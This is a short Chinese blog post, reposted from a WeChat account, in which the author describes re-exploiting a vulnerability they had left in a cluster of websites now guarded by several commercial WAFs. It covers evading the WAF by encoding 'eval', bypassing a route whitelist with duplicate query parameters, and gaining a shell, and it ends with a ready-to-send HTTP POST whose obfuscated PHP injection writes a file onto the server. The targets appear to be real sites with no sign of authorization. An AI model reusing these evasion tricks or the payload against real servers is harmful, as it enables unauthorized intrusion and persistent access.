原文:https://mp.weixin.qq.com/s/GWKhrMilIXOeUgO6CyUUqQ
已授权转载,有兴趣可以关注下公众号
某集约化站群去年留的漏洞,今年用的时候发现被拦截了。吐槽下,这是彻底疯狂了吗,百度云 waf、华为云 waf、安全狗都弄一起是什么鬼啊.....
waf bypass
比较简单,过滤了 eval 编码下就行。
路由白名单限制 bypass
随意请求访问发现存在路由限制,只允许访问指定路径。
但是不可能所有路径都写死,比如搜索功能需要接收用户输入内容,抓包确认搜索接口可以正常使用且不会触发路由白名单限制。
因此猜测可以利用参数污染绕过限制,例如:
#插入同名参数
/index.php?name=bob&name=rose
#后端实际可能接收
name=rose
getshell 后查看代码,确认该接口匹配的是任意内容。
最终 payload
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'